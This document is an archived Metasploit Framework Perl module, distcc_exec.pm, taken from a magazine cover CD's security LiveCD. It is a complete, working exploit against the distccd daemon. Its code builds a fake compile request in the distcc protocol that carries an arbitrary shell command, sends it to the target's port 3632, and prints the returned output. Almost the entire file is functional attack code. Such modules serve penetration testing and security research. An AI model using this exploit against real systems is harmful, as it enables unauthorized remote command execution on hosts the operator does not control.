home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / distcc_exec.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  2.9 KB  |  137 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::distcc_exec;
  11. use base "Msf::Exploit";
  12. use Pex::Text;
  13. use strict;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.     'Name'  => 'DistCC Daemon Command Execution',
  20.     'Version'  => '$Revision: 1.8 $',
  21.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>'],
  22.  
  23.     'Arch'  => [ ],
  24.     'OS'    => [ ],
  25.     'Priv'  => 0,
  26.  
  27.     'UserOpts'  =>
  28.       {
  29.         'RHOST' => [1, 'ADDR', 'The target address'],
  30.         'RPORT' => [1, 'PORT', 'The distccd server port', 3632],
  31.       },
  32.       
  33.     'Payload' =>
  34.       {
  35.         'Space'    => 1024,
  36.         'Keys'     => ['cmd', 'cmd_bash'],
  37.       },
  38.  
  39.     'Description'  => Pex::Text::Freeform(qq{
  40.         This module uses a documented security weakness to execute
  41.         arbitrary commands on any system running distccd. 
  42. }),
  43.  
  44.     'Refs'  =>
  45.       [
  46.           ['OSVDB', '13378'],      
  47.         ['MIL', '19'],
  48.         ['URL', 'http://distcc.samba.org/security.html'],
  49.       ],
  50.  
  51.     'Keys'  =>  ['distcc'],
  52.   };
  53.  
  54. sub new {
  55.     my $class = shift;
  56.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  57.     return($self);
  58. }
  59.  
  60. sub Exploit {
  61.     my $self = shift;
  62.     my $target_host = $self->GetVar('RHOST');
  63.     my $target_port = $self->GetVar('RPORT');
  64.     my $shellcode   = $self->GetVar('EncodedPayload')->RawPayload;
  65.     my ($res, $len);
  66.  
  67.     my $s = Msf::Socket::Tcp->new
  68.       (
  69.         'PeerAddr'  => $target_host,
  70.         'PeerPort'  => $target_port,
  71.         'LocalPort' => $self->GetVar('CPORT'),
  72.         'SSL'       => $self->GetVar('SSL'),
  73.       );
  74.  
  75.     if ($s->IsError) {
  76.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  77.         return;
  78.     }
  79.  
  80.     my $distcmd = $self->DistCommand("sh", "-c", $shellcode);
  81.     $s->Send($distcmd);
  82.  
  83.     my $app = "DOTI0000000A"."METASPLOIT\n";
  84.     $s->Send($app);
  85.  
  86.     $res = $s->Recv(24, 5);
  87.     if (! $res || length($res) != 24) {
  88.         $self->PrintLine("[*] The remote distccd did not reply to our request");
  89.         return;
  90.     }
  91.  
  92.     # Check STDERR
  93.     $res = $s->Recv(4, 5);
  94.     $res = $s->Recv(8, 5);
  95.     $len = unpack('N', pack('H*', $res));
  96.     if ($len) {
  97.         $res = $s->Recv($len, 5);
  98.         foreach (split(/\n/, $res)) {
  99.             $self->PrintLine("stderr: $_");
  100.         }
  101.     }
  102.  
  103.     # Check STDOUT
  104.     $res = $s->Recv(4, 5);
  105.     $res = $s->Recv(8, 5);
  106.     $len = unpack('N', pack('H*', $res));
  107.     if ($len) {
  108.         $res = $s->Recv($len, 5);
  109.         foreach (split(/\n/, $res)) {
  110.             $self->PrintLine("stdout: $_");
  111.         }
  112.     }
  113. }
  114.  
  115. sub DistCommand {
  116.     my $self = shift;
  117.  
  118.     # convince distcc that this is a compile
  119.     push @_, "#";
  120.     push @_, "-c";
  121.     push @_, "main.c";
  122.     push @_, "-o";
  123.     push @_, "main.o";
  124.  
  125.     # set distcc 'magic fairy dust' and argument count
  126.     my $res = "DIST00000001".sprintf("ARGC%.8x", scalar(@_));
  127.  
  128.     # set the arguments
  129.     foreach (@_) {
  130.         $res .= sprintf("ARGV%.8x%s", length($_), $_);
  131.     }
  132.  
  133.     return $res;
  134. }
  135.  
  136. 1;
  137.